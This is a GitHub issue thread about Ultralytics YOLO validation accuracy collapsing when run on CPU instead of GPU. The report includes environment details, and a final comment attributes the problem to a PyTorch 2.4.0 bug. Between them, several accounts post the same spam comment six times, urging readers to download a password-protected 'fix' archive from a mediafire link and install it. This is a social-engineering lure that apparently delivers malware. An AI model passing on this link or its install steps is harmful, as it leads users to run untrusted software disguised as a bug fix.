### ISSUE TITLE
Different validation results with CPU or GPU

### ISSUE THREAD

**Issue by AlexPasqua** [ultralytics/ultralytics#15836]
### Search before asking

- [X] I have searched the Ultralytics YOLO [issues](https://github.com/ultralytics/ultralytics/issues) and found no similar bug report.

### Ultralytics YOLO Component

Val

### Bug

Hello,
The validation results when changing only the device are massively different. For reference, in my case they change from 93.7% top1 and 100% top5 with GPU, to 16.2% top1 and 50.5% top5 with CPU.

### Environment

Ultralytics YOLOv8.2.70 🚀 Python-3.12.5 torch-2.4.0+cu124 CUDA:0 (Quadro RTX 4000, 8192MiB)
Setup complete ✅ (96 CPUs, 94.7 GB RAM, 215.4/475.9 GB disk)

OS                  Windows-10-10.0.19045-SP0    
Environment         Windows
Python              3.12.5
Install             git
RAM                 94.71 GB
CPU                 Intel Xeon Gold 5220R 2.20GHz
CUDA                12.4

numpy               ✅ 1.26.3<2.0.0,>=1.23.0
matplotlib          ✅ 3.9.1>=3.3.0
opencv-python       ✅ 4.10.0.84>=4.6.0
pillow              ✅ 10.2.0>=7.1.2
pyyaml              ✅ 6.0.1>=5.3.1
requests            ✅ 2.32.3>=2.23.0
scipy               ✅ 1.14.0>=1.4.1
torch               ✅ 2.4.0+cu124>=1.8.0
torchvision         ✅ 0.19.0+cu124>=0.9.0
tqdm                ✅ 4.66.4>=4.64.0
psutil              ✅ 6.0.0
py-cpuinfo          ✅ 9.0.0
pandas              ✅ 2.2.2>=1.1.4
seaborn             ✅ 0.13.2>=0.11.0
ultralytics-thop    ✅ 2.0.0>=2.0.0

### Minimal Reproducible Example

Example code:
```python
model = YOLO(path_to_model_checkpoint)
model.val(data=my_data_config.yaml, plots=True, device=0)
```

The only thing I change when running with CPU is the `device` param in `model.val()`: instead of 0 I put `'cpu'`.

### Are you willing to submit a PR?

- [ ] Yes I'd like to help by submitting a PR!

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Y-T-G** [comment]
It's a PyTorch bug with 2.4.0 and CPU inference.

https://github.com/ultralytics/ultralytics/issues/15049
